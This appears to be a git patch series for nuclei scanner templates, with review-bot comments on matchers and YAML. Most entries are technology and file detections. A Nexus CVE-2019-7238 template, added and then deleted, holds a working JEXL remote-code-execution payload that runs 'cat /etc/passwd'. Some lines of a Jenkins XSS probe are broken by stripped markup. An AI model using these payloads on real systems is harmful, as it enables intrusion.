@@ -0,0 +1,30 @@ +id: drupal-user-enum-redirect + +info: + name: Drupal User Enumration [Redirect] + author: 0w4ys + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/user/0" + - "{{BaseURL}}/user/1" + - "{{BaseURL}}/user/2" + - "{{BaseURL}}/user/3" + headers: + User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Location: http(s|):\/\/[\w\.\-]+(\/ar|\/en|)\/users\/\w+' + part: header + - type: status + status: + - 301 + extractors: + - type: regex + part: header + regex: + - 'users\/\w+' From 635446eb26618a8ae09c3398b4c8793d775883d3 Mon Sep 17 00:00:00 2001 From: Gabriel Geraldino Date: Sun, 30 Aug 2020 14:42:46 -0300 Subject: [PATCH 19/36] Create CVE-2020-2140.yaml --- cves/CVE-2020-2140.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cves/CVE-2020-2140.yaml diff --git a/cves/CVE-2020-2140.yaml b/cves/CVE-2020-2140.yaml new file mode 100644 index 0000000000..30ce5cd722 --- /dev/null +++ b/cves/CVE-2020-2140.yaml @@ -0,0 +1,22 @@ +id: CVE-2020-2140 +info: + author: j3ssie/geraldino2 + description: Jenkin rXSS vulnerability + name: Jenkin Audit XSS + severity: medium +requests: + - matchers: + - status: + - 200 + type: status + - part: body + type: word + words: + -
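Review bot: The `Location` regex in this hunk, `http(s|):\/\/[\w\.\-]+(\/ar|\/en|)\/users\/\w+`, cannot match a host with a port (`:` is outside `[\w\.\-]`) and only tolerates the `/ar` and `/en` language prefixes, so a Drupal site on `host:8080` or with `/fr`, `/de`, `/pt-br` prefixes is silently missed; `https?:\/\/[^\/\s]+(\/[a-z]{2}(-[a-z]{2})?)?\/users\/\w+` covers those without loosening the `/users/<name>` part. The status matcher only accepts `301`, while a `302`/`303` redirect to the same alias is the same enumeration signal — consider listing `- 302` and `- 303` as well. Also `/user/0` is, as far as I know, the anonymous account in Drupal and will not resolve to a real user, and `name:` has a typo: `Drupal User Enumeration [Redirect]`.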

sample + matchers-condition: and + method: GET + path: + - >- + {{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j

sample + - >- + {{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j

sample From 5fa09b15cc91058e379aeebd06a708be1c6e5134 Mon Sep 17 00:00:00 2001 From: Gabriel Geraldino Date: Sun, 30 Aug 2020 15:03:30 -0300 Subject: [PATCH 20/36] Create CVE-2019-7238.yaml --- cves/CVE-2019-7238.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/CVE-2019-7238.yaml diff --git a/cves/CVE-2019-7238.yaml b/cves/CVE-2019-7238.yaml new file mode 100644 index 0000000000..f4621fe67d --- /dev/null +++ b/cves/CVE-2019-7238.yaml 
@@ -0,0 +1,33 @@ +id: CVE-2019-7238 +info: + author: geraldino2 + name: Nexus Repository Manager 3 RCE + severity: high +requests: + - body: > + {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": + [{"direction": "ASC", "property": "name"}], "start": 0, "filter": + [{"property": "repositoryName", "value": "*"}, {"property": "expression", + "value": "function(x, y, z, c, integer, defineClass){ + c=1.class.forName('java.lang.Character'); integer=1.class; + x='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'; + y=0; z=''; while (y lt x.length()){ z += + c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; + };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); + \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n + 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n + 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat + /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], + "limit": 50, "page": 1}], "method": "previewAssets"} + matchers: + - status: + - 200 + type: status + - part: body + regex: + - 'root:[x*]:0:0:' + type: regex + matchers-condition: and + method: POST + path: + - '{{BaseURL}}/service/extdirect' From 72a2b1ec29a74014747aacab5d914e5a93d7e34a Mon Sep 17 00:00:00 2001 From: Gabriel Geraldino Date: Sun, 30 Aug 2020 15:08:56 -0300 Subject: [PATCH 21/36] Delete CVE-2019-7238.yaml --- cves/CVE-2019-7238.yaml | 33 --------------------------------- 1 file changed, 33 deletions(-) delete mode 100644 cves/CVE-2019-7238.yaml diff --git a/cves/CVE-2019-7238.yaml b/cves/CVE-2019-7238.yaml deleted file mode 100644 index f4621fe67d..0000000000 
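Review bot: The `info` block of this new template carries neither a `description` nor a reference, although the request body is an active exploitation check that runs a command on the target rather than a passive fingerprint; a reader of the template index cannot tell that from `name` and `severity` alone. A one-line `description:` summarising the affected versions and a `# Source:` reference comment, in the style the CVE-2020-2140 template adopts later in this series, would make the intent of the template explicit. PATCH 21 deletes the file again, so this applies only if it is reintroduced.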
--- a/cves/CVE-2019-7238.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2019-7238 -info: - author: geraldino2 - name: Nexus Repository Manager 3 RCE - severity: high -requests: - - body: > - {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": - [{"direction": "ASC", "property": "name"}], "start": 0, "filter": - [{"property": "repositoryName", "value": "*"}, {"property": "expression", - "value": "function(x, y, z, c, integer, defineClass){ - c=1.class.forName('java.lang.Character'); integer=1.class; - x='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'; - y=0; z=''; while (y lt x.length()){ z += - c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; - };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); - \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n - 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n - 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat - /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], - "limit": 50, "page": 1}], "method": "previewAssets"} - matchers: - - status: - - 200 - type: status - - part: body - regex: - - 'root:[x*]:0:0:' - type: regex - matchers-condition: and - method: POST - path: - - '{{BaseURL}}/service/extdirect' From 42035ee66febc5f7e731ed26951caecff19b8b98 Mon Sep 17 00:00:00 2001 From: un-fmunozs Date: Mon, 31 Aug 2020 00:01:26 -0500 Subject: [PATCH 22/36] Update favicon-detection.yaml --- technologies/favicon-detection.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 28ec32ffa5..5afbee4c91 100644 --- a/technologies/favicon-detection.yaml 
+++ b/technologies/favicon-detection.yaml @@ -14,6 +14,7 @@ info: # 17542,e16377344d2d52a15e735041b3eb2c5a,jenkins # 1150,6d2adf39ca320265830403dfc030033a,liferay # 3638,59a0c7b6e4848ccdabcea0636efda02b,blogger + # 198,c6acedaff906029fc5455d9ec52c7f42,wordpress # 5430,c291c057816f71ce15ba5c496f1a965a,wordpress # 1611,f7e3d97f404e71d302b3239eef48d5f2,gitlab # 6093,88717398db158e3330ce94fc1784e4a7,jira @@ -63,6 +64,10 @@ requests: name: jenkins dsl: - "len(body)==17542 && status_code==200 && (\"23e8c7bd78e8cd826c5a6073b15068b1\" == md5(body))" + - type: dsl + name: wordpress + dsl: + - "len(body)==198 && status_code==200 && (\"c6acedaff906029fc5455d9ec52c7f42\" == md5(body))" - type: dsl name: wordpress dsl: From dfc487caba89e675b1129ec0980c431e85f4be52 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Mon, 31 Aug 2020 13:08:04 +0530 Subject: [PATCH 23/36] Update CVE-2020-2140.yaml --- cves/CVE-2020-2140.yaml | 34 +++++++++++++++++++--------------- 1 file changed, 19 insertions(+), 15 deletions(-) diff --git a/cves/CVE-2020-2140.yaml b/cves/CVE-2020-2140.yaml index 30ce5cd722..f3474eb547 100644 --- a/cves/CVE-2020-2140.yaml +++ b/cves/CVE-2020-2140.yaml @@ -1,22 +1,26 @@ id: CVE-2020-2140 info: author: j3ssie/geraldino2 - description: Jenkin rXSS vulnerability - name: Jenkin Audit XSS + description: Jenkin AuditTrailPlugin rXSS vulnerability + name: Jenkin AuditTrailPlugin XSS severity: medium + description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. + + # Source:- https://nvd.nist.gov/vuln/detail/CVE-2020-2140 + requests: - - matchers: - - status: - - 200 - type: status - - part: body - type: word + - method: GET + path: + - "{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j
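Review bot: The `dsl` matcher added in the second hunk is named `wordpress`, the same `name` as the existing wordpress matcher that follows it, so two matchers now report under one label and the output cannot distinguish a hit on the 198-byte favicon from one on the 5430-byte favicon. Either give the new entry a distinct name such as `name: wordpress-198`, or fold both expressions into a single `dsl:` list with `condition: or`, if the nuclei version in use accepts a condition on dsl lists. The comment table updated in the first hunk is consistent with the new hash and length.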

sample" + - "{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j

sample" + + matchers-condition: and + matchers: + - type: word words: -

sample - matchers-condition: and - method: GET - path: - - >- - {{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j

sample - - >- - {{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j

sample + part: body + + - type: status + status: + - 200 \ No newline at end of file From 1dd5658717c85dbff501e30c9cb4e1cc0591bc3e Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Mon, 31 Aug 2020 13:09:38 +0530 Subject: [PATCH 24/36] Update CVE-2020-2140.yaml --- cves/CVE-2020-2140.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/CVE-2020-2140.yaml b/cves/CVE-2020-2140.yaml index f3474eb547..d62112e618 100644 --- a/cves/CVE-2020-2140.yaml +++ b/cves/CVE-2020-2140.yaml @@ -1,7 +1,6 @@ id: CVE-2020-2140 info: author: j3ssie/geraldino2 - description: Jenkin AuditTrailPlugin rXSS vulnerability name: Jenkin AuditTrailPlugin XSS severity: medium description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. From a867f996c5b278808199168c4bc03a664adc87bb Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Mon, 31 Aug 2020 13:15:28 +0530 Subject: [PATCH 25/36] moved to correct folder and updated severity --- .../drupal-user-enum-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename {vulnerabilities => security-misconfiguration}/drupal-user-enum-redirect.yaml (97%) diff --git a/vulnerabilities/drupal-user-enum-redirect.yaml b/security-misconfiguration/drupal-user-enum-redirect.yaml similarity index 97% rename from vulnerabilities/drupal-user-enum-redirect.yaml rename to security-misconfiguration/drupal-user-enum-redirect.yaml index beb97c91b5..bdf4546bb1 100644 --- a/vulnerabilities/drupal-user-enum-redirect.yaml +++ b/security-misconfiguration/drupal-user-enum-redirect.yaml @@ -3,7 +3,7 @@ id: drupal-user-enum-redirect info: name: Drupal User Enumration [Redirect] author: 0w4ys - severity: low + severity: info requests: - method: GET From c86aff54989cb83893c5c427737a6db063c8a8e4 Mon Sep 17 00:00:00 2001 
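Review bot: The rewritten `info` mapping ends up with two `description:` keys — the one-line `Jenkin AuditTrailPlugin rXSS vulnerability` and the NVD sentence — which a strict YAML loader rejects and a lenient one resolves by silently keeping only one of them. PATCH 24 removes the first key, but `name: Jenkin AuditTrailPlugin XSS` still misspells the product; `name: Jenkins AuditTrailPlugin XSS` would match the corrected description. The file now also ends without a trailing newline (`\ No newline at end of file`), unlike the version it replaces.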
From: Dwi Siswanto Date: Mon, 31 Aug 2020 17:35:45 +0700 Subject: [PATCH 26/36] :hammer: Add regex matcher for time_local at body --- files/wordpress-debug-log.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/files/wordpress-debug-log.yaml b/files/wordpress-debug-log.yaml index afa317a2ff..d76ab4b456 100644 --- a/files/wordpress-debug-log.yaml +++ b/files/wordpress-debug-log.yaml @@ -2,14 +2,13 @@ id: wp-debug-log info: name: WordPress debug log - author: geraldino2 + author: geraldino2 & @dwisiswant0 severity: info requests: - method: GET path: - "{{BaseURL}}/wp-content/debug.log" - matchers-condition: and matchers: - type: word @@ -18,7 +17,10 @@ requests: - text/plain part: header condition: or - + - type: regex + regex: + - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP" + part: body - type: status status: - 200 \ No newline at end of file From 99cd7a6b3c5872010d606255a0006eba58baf8c1 Mon Sep 17 00:00:00 2001 From: Casper Guldbech Nielsen Date: Mon, 31 Aug 2020 15:52:36 +0200 Subject: [PATCH 27/36] Included detection of Lotus-Domino server based on Headers Signed-off-by: Casper Guldbech Nielsen --- technologies/lotus-domino-detect.yaml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 technologies/lotus-domino-detect.yaml diff --git a/technologies/lotus-domino-detect.yaml b/technologies/lotus-domino-detect.yaml new file mode 100644 index 0000000000..a923ff8b4c --- /dev/null +++ b/technologies/lotus-domino-detect.yaml @@ -0,0 +1,15 @@ +id: lotus-domino-detect +info: + name: IBM Lotus Domino Detect + author: CasperGN + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/" + matchers: + - type: word + words: + - "Server: Lotus-Domino" + part: header \ No newline at end of file From c833fd9da08efea2edf6bdc86f28ec6ef7ce4888 Mon Sep 17 00:00:00 2001 From: Casper Guldbech Nielsen Date: Mon, 31 Aug 2020 17:25:09 +0200 Subject: [PATCH 28/36] Adding robots.txt as file module 
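Review bot: The first hunk drops `matchers-condition: and`, so the three matchers are now combined with nuclei's default OR and the `type: status` matcher on its own turns any 200 response for `/wp-content/debug.log` into a hit — a catch-all page that answers 200 would be reported as a debug log without either content check passing. Keep `matchers-condition: and` above `matchers:`. Separately, the regex added in the second hunk leaves the literal brackets of the timestamp unescaped: `[[0-9]{2}` is parsed as a character class containing `[` and the digits, so the pattern only matches because matching is unanchored and the leading `[` is skipped. A single-quoted `'\[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}\] PHP'` states the intent (single quotes, because `\[` is not a valid escape inside a YAML double-quoted string).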
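Review bot: The word matcher `"Server: Lotus-Domino"` on `part: header` depends on the exact header-name case and the exact `: ` spacing; header names are case-insensitive, and responses received over HTTP/2 carry them lower-cased, so a `server: Lotus-Domino` response may be missed depending on how the header part is rendered. A case-insensitive regex matcher such as `(?i)server:\s*lotus-domino` on the header part is more robust. The same applies to the copy of this matcher moved into tech-detect.yaml in PATCH 31 and to the `Set-Cookie: mongo-express=` matcher added in PATCH 32.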
Signed-off-by: Casper Guldbech Nielsen --- files/robots.txt.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 files/robots.txt.yaml diff --git a/files/robots.txt.yaml b/files/robots.txt.yaml new file mode 100644 index 0000000000..af3f36625f --- /dev/null +++ b/files/robots.txt.yaml @@ -0,0 +1,18 @@ +id: robots-txt +info: + name: robots.txt file + author: CasperGN + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/robots.txt" + matchers-condition: and + matchers: + - type: word + words: + - "Disallow:" + status: + - 200 + condition: and \ No newline at end of file From 65026f8545feee6ea8bf278a967ffb1ec26003a5 Mon Sep 17 00:00:00 2001 From: Casper Guldbech Nielsen Date: Mon, 31 Aug 2020 17:28:19 +0200 Subject: [PATCH 29/36] renaming to uphold extension Signed-off-by: Casper Guldbech Nielsen --- panels/{traefik-dashboard => traefik-dashboard.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename panels/{traefik-dashboard => traefik-dashboard.yaml} (100%) diff --git a/panels/traefik-dashboard b/panels/traefik-dashboard.yaml similarity index 100% rename from panels/traefik-dashboard rename to panels/traefik-dashboard.yaml From 34d5f1c5866348566507ca3cc492132dcd338f68 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Mon, 31 Aug 2020 22:47:14 +0530 Subject: [PATCH 30/36] Update robots.txt.yaml --- files/robots.txt.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/files/robots.txt.yaml b/files/robots.txt.yaml index af3f36625f..16d10baef9 100644 --- a/files/robots.txt.yaml +++ b/files/robots.txt.yaml @@ -13,6 +13,12 @@ requests: - type: word words: - "Disallow:" + + - type: word + words: + - text/plain + part: header + + - type: status status: - - 200 - condition: and \ No newline at end of file + - 200 \ No newline at end of file From 2341811f6576536581c0df9d91868029d39c2c27 Mon Sep 17 00:00:00 2001 
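Review bot: `status:` and `condition: and` in the new matcher list sit inside the `type: word` matcher rather than in a matcher of `type: status`, so the 200 check is not applied as written, and `matchers-condition: and` has only one matcher to combine. As committed, the template fires on any response body containing `Disallow:` regardless of status code. PATCH 30 splits this into a separate `- type: status` entry, so the fix is already in the series.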
From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Mon, 31 Aug 2020 22:50:06 +0530 Subject: [PATCH 31/36] moving this to tech detect --- technologies/lotus-domino-detect.yaml | 15 --------------- technologies/tech-detect.yaml | 8 +++++++- 2 files changed, 7 insertions(+), 16 deletions(-) delete mode 100644 technologies/lotus-domino-detect.yaml diff --git a/technologies/lotus-domino-detect.yaml b/technologies/lotus-domino-detect.yaml deleted file mode 100644 index a923ff8b4c..0000000000 --- a/technologies/lotus-domino-detect.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: lotus-domino-detect -info: - name: IBM Lotus Domino Detect - author: CasperGN - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}/" - matchers: - - type: word - words: - - "Server: Lotus-Domino" - part: header \ No newline at end of file diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index 1d8f68b707..91cf5effe1 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -2688,4 +2688,10 @@ requests: words: - "/etc/clientlibs/" - "/content/dam/" - part: body \ No newline at end of file + part: body + + - type: word + name: lotus-domino + words: + - "Server: Lotus-Domino" + part: header From f70ab2d5c8444a650c8a3478cd77160c3719b0c4 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Mon, 31 Aug 2020 23:56:18 +0530 Subject: [PATCH 32/36] Update tech-detect.yaml --- technologies/tech-detect.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index 91cf5effe1..86b17797a6 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml 
@@ -2695,3 +2695,23 @@ requests: words: - "Server: Lotus-Domino" part: header + + - type: word + name: mongo-express-web-gui + words: + - "Set-Cookie: mongo-express=" + part: header + + - type: word + name: pf-sense-ui + words: + - "Login to pfSense" + + - type: word + name: weave-scope-dashboard + words: + - "Weave Scope" + - "__WEAVEWORKS_CSRF_TOKEN" + - "__CSRF_TOKEN_PLACEHOLDER__" + condition: and + part: body From 46cf7286226ec43c11d014a2850598f2885ac672 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Mon, 31 Aug 2020 23:57:18 +0530 Subject: [PATCH 33/36] moved this to tech detect --- panels/mongo-express-web-gui.yaml | 16 ---------------- panels/pfsense-web-gui.yaml | 16 ---------------- panels/weave-scope-dashboard-detect.yaml | 20 -------------------- 3 files changed, 52 deletions(-) delete mode 100644 panels/mongo-express-web-gui.yaml delete mode 100644 panels/pfsense-web-gui.yaml delete mode 100644 panels/weave-scope-dashboard-detect.yaml diff --git a/panels/mongo-express-web-gui.yaml b/panels/mongo-express-web-gui.yaml deleted file mode 100644 index 99c78170d1..0000000000 --- a/panels/mongo-express-web-gui.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: mongo-express-web-gui - -info: - name: Mongo Express Web GUI - author: puzzlepeaches - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}/" - matchers: - - type: word - words: - - "Set-Cookie: mongo-express=" - part: header diff --git a/panels/pfsense-web-gui.yaml b/panels/pfsense-web-gui.yaml deleted file mode 100644 index c90408ba49..0000000000 --- a/panels/pfsense-web-gui.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: pfsense-web-gui - -info: - name: pfSense Web GUI - author: ossie - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}/" - - matchers: - - type: word - words: - - "Login to pfSense" \ No newline at end of file 
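Review bot: The `pf-sense-ui` matcher omits `part:` while the two matchers around it state `part: header` and `part: body` explicitly; the default is body, so behaviour is unchanged, but adding `part: body` keeps the three new entries in the same style as the rest of the file. The `name:` values also differ from the ids of the standalone templates they replace in PATCH 33 (`pfsense-web-gui` becomes `pf-sense-ui`, `mongo-express-web-gui` keeps its id, `weave-scope-dashboard-detect` becomes `weave-scope-dashboard`), which anyone filtering output by the old ids will need to know.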
diff --git a/panels/weave-scope-dashboard-detect.yaml b/panels/weave-scope-dashboard-detect.yaml deleted file mode 100644 index 0b1d93761a..0000000000 --- a/panels/weave-scope-dashboard-detect.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: weave-scope-dashboard-detect - -info: - name: Weave Scope Dashboard - author: e_schultze_ - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - "Weave Scope" - - "__WEAVEWORKS_CSRF_TOKEN" - - "__CSRF_TOKEN_PLACEHOLDER__" - condition: and - part: body From 9bf0b6dbafbed08661188f81cd3fb587c448cb60 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Tue, 1 Sep 2020 00:04:29 +0530 Subject: [PATCH 34/36] uniform format --- cves/CVE-2017-9841.yaml | 2 +- cves/CVE-2018-1271.yaml | 2 +- cves/CVE-2019-17382.yaml | 2 +- cves/CVE-2019-3396.yaml | 2 +- cves/CVE-2020-3187.yaml | 2 +- cves/CVE-2020-5405.yaml | 2 +- default-credentials/rabbitmq-default-admin.yaml | 2 +- panels/jmx-console.yaml | 2 +- security-misconfiguration/jira-unauthenticated-user-picker.yaml | 2 +- vulnerabilities/oracle-ebs-bispgraph-file-access.yaml | 2 +- vulnerabilities/wordpress-wordfence-xss.yaml | 2 +- 11 files changed, 11 insertions(+), 11 deletions(-) diff --git a/cves/CVE-2017-9841.yaml b/cves/CVE-2017-9841.yaml index bc13e27620..5ed50dd95b 100644 --- a/cves/CVE-2017-9841.yaml +++ b/cves/CVE-2017-9841.yaml @@ -3,7 +3,7 @@ id: CVE-2017-9841 info: name: CVE-2017-9841 author: Random-Robbie - severity: High + severity: high description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "" - part: body + part: body \ No newline at end of file From d80c30d0d7ab3844064de14cd145637676343ff1 Mon Sep 17 00:00:00 2001 
From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Tue, 1 Sep 2020 02:50:59 +0530 Subject: [PATCH 35/36] Update issue templates --- .github/ISSUE_TEMPLATE/submit-template.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 .github/ISSUE_TEMPLATE/submit-template.md diff --git a/.github/ISSUE_TEMPLATE/submit-template.md b/.github/ISSUE_TEMPLATE/submit-template.md new file mode 100644 index 0000000000..a682945ed5 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/submit-template.md @@ -0,0 +1,14 @@ +--- +name: Submit Template +about: Submit nuclei template using issue +title: "[nuclei-template] " +labels: '' +assignees: '' + +--- + +**Template Details** + +``` +nuclei template goes here +``` From ca4dbf605b27a452ec46b2d6d3382b5475c4b152 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 1 Sep 2020 09:25:25 +0700 Subject: [PATCH 36/36] :abcd: Justifying id's --- ...ect.yaml => workspaceone-uem-airwatch-dashboard-detect.yaml} | 2 +- technologies/github-enterprise-detect.yaml | 2 +- technologies/gitlab-detect.yaml | 2 +- technologies/jaspersoft-detect.yaml | 2 +- technologies/sap-netweaver-detect.yaml | 2 +- technologies/weblogic-detect.yaml | 2 +- vulnerabilities/discourse-xss.yaml | 2 +- vulnerabilities/ibm-infoprint-directory-traversal.yaml | 2 +- 8 files changed, 8 insertions(+), 8 deletions(-) rename panels/{workspaceone-uem-airWatch-dashboard-detect.yaml => workspaceone-uem-airwatch-dashboard-detect.yaml} (87%) diff --git a/panels/workspaceone-uem-airWatch-dashboard-detect.yaml b/panels/workspaceone-uem-airwatch-dashboard-detect.yaml similarity index 87% rename from panels/workspaceone-uem-airWatch-dashboard-detect.yaml rename to panels/workspaceone-uem-airwatch-dashboard-detect.yaml index 527f17e11c..382e84d75b 100644 --- a/panels/workspaceone-uem-airWatch-dashboard-detect.yaml +++ b/panels/workspaceone-uem-airwatch-dashboard-detect.yaml 
@@ -1,4 +1,4 @@ -id: workspaceone-uem-airWatch-dashboard-detect +id: workspaceone-uem-airwatch-dashboard-detect info: name: Workspace ONE Unified Endpoint Management (UEM) AirWatch diff --git a/technologies/github-enterprise-detect.yaml b/technologies/github-enterprise-detect.yaml index 2b6bdf4071..4fe42a8a3a 100644 --- a/technologies/github-enterprise-detect.yaml +++ b/technologies/github-enterprise-detect.yaml @@ -1,4 +1,4 @@ -id: Github-Enterprise-Detect +id: github-enterprise-detect info: name: Detect Github Enterprise diff --git a/technologies/gitlab-detect.yaml b/technologies/gitlab-detect.yaml index 816fcf390d..5aff27ac1e 100644 --- a/technologies/gitlab-detect.yaml +++ b/technologies/gitlab-detect.yaml @@ -1,4 +1,4 @@ -id: Gitlab-Detect +id: gitlab-detect info: name: Detect Gitlab diff --git a/technologies/jaspersoft-detect.yaml b/technologies/jaspersoft-detect.yaml index 9ab5bc3a91..7cafc9a84d 100644 --- a/technologies/jaspersoft-detect.yaml +++ b/technologies/jaspersoft-detect.yaml @@ -1,4 +1,4 @@ -id: Jaspersoft-detect +id: jaspersoft-detect info: name: Jaspersoft detected diff --git a/technologies/sap-netweaver-detect.yaml b/technologies/sap-netweaver-detect.yaml index a1dcdfc77a..631dd2667f 100644 --- a/technologies/sap-netweaver-detect.yaml +++ b/technologies/sap-netweaver-detect.yaml @@ -1,4 +1,4 @@ -id: SAP-Netweaver-Detect +id: sap-netweaver-detect info: name: SAP NetWeaver Detect author: rakeshmane10 diff --git a/technologies/weblogic-detect.yaml b/technologies/weblogic-detect.yaml index 5242170285..704b159c7c 100644 --- a/technologies/weblogic-detect.yaml +++ b/technologies/weblogic-detect.yaml @@ -1,4 +1,4 @@ -id: WebLogic-Detect +id: weblogic-detect info: name: Detect Weblogic diff --git a/vulnerabilities/discourse-xss.yaml b/vulnerabilities/discourse-xss.yaml index ddc26121c9..094cdfe7d1 100644 --- a/vulnerabilities/discourse-xss.yaml +++ b/vulnerabilities/discourse-xss.yaml 
@@ -1,4 +1,4 @@ -id: Discourse XSS +id: discourse-xss info: name: Discourse CMS - XSS diff --git a/vulnerabilities/ibm-infoprint-directory-traversal.yaml b/vulnerabilities/ibm-infoprint-directory-traversal.yaml index d80eaf0ea7..f9d3494560 100644 --- a/vulnerabilities/ibm-infoprint-directory-traversal.yaml +++ b/vulnerabilities/ibm-infoprint-directory-traversal.yaml @@ -1,4 +1,4 @@ -id: IBM InfoPrint Directory Traversal +id: ibm-infoprint-directory-traversal info: name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal